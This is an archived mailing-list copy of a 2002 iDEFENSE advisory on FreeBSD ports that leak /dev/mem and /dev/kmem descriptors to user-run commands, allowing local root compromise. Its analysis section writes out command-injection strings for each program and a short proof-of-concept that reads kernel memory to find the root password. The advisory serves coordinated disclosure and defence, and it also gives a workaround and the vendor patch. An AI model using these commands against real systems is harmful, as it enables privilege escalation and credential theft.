OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Endler (dendler_at_idefense.com)
Date: Mon Sep 16 2002 - 14:10:39 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    iDEFENSE Security Advisory 09.16.2002
    FreeBSD Ports libkvm Security Vulnerabilities

    DESCRIPTION

    The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2
    can be locally manipulated to take advantage of open file
    descriptors /dev/mem and /dev/kmem to gain root privileges on
    a target host. These five programs are installed setgid kmem
    by default. They will drop kmem privileges before executing
    user specified commands but file descriptors to /dev/mem and
    /dev/kmem will remain open. This can lead to a local root
    compromise in various ways (e.g. if an attacker chooses to
    scan for the master password file in the Linux kernel memory).

    ANALYSIS

    The latest versions of all five above mentioned FreeBSD ports
    are vulnerable, the following examples illustrate the
    problems:

    bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep
    dummy|grep mem"

    dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
    dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

    bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep
    mem"

    dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
    dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

    bash-2.05a$ cat .wmmonrc
    left "/home/dim/dummy"
    bash-2.05a$ wmmon &
    [1] 793
    bash-2.05a$ Monitoring 5 devices for activity.
    current stat is :1

    bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
    dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
    dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

    bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep
    dummy|grep mem"
    wmnet: using kmem driver to monitor ec0
    dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
    dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem

    One possible exploit for these vulnerabilities is to replace
    getch() in strings(1) with:

    int getch()
    {
    char buf[4];
    read(4,buf,1);
    return buf[0];
    }

    or a similar less CPU expensive function that reads a
    character from the /dev/mem file descriptor and execute the
    following:

    wmnet2 -e exploit|grep root|grep Charlie

    DETECTION

    The latest copies of asmon, ascpu, bubblemon, wmmon, and
    wmnet2 from the FreeBSD ports collection are vulnerable and
    were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD,
    all FreeBSD ports that use libkvm prior to and including
    4.6.2-RELEASE may also be vulnerable.

    WORKAROUND

    Remove the setgid bit on the affected applications,
    however reducing the functionality:

    chmod g-s /path.to/wmnet2

    VENDOR RESPONSE

    The FreeBSD advisory to be released in coordination with this
    advisory is FreeBSD-SA-02:39.libkvm. FreeBSD has provided
    the following patch details:

    "Upgrade your vulnerable system to 4.6-STABLE; or to the
    RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated
    after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20,
    or 4.4-RELEASE-p27)."

    DISCLOSURE TIMELINE

    August 12, 2002 - Disclosed to iDEFENSE
    September 6, 2002 - Disclosed to FreeBSD Security
    September 6, 2002 - Disclosed to iDEFENSE clients
    September 16, 2002 - Coordinated public disclosure by FreeBSD
                          and iDEFENSE

    CREDIT

    This issue was exclusively disclosed to iDEFENSE by
    badc0dedbadc0ded.com

    http://www.idefense.com/contributor.html

    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071

    dendleridefense.com
    www.idefense.com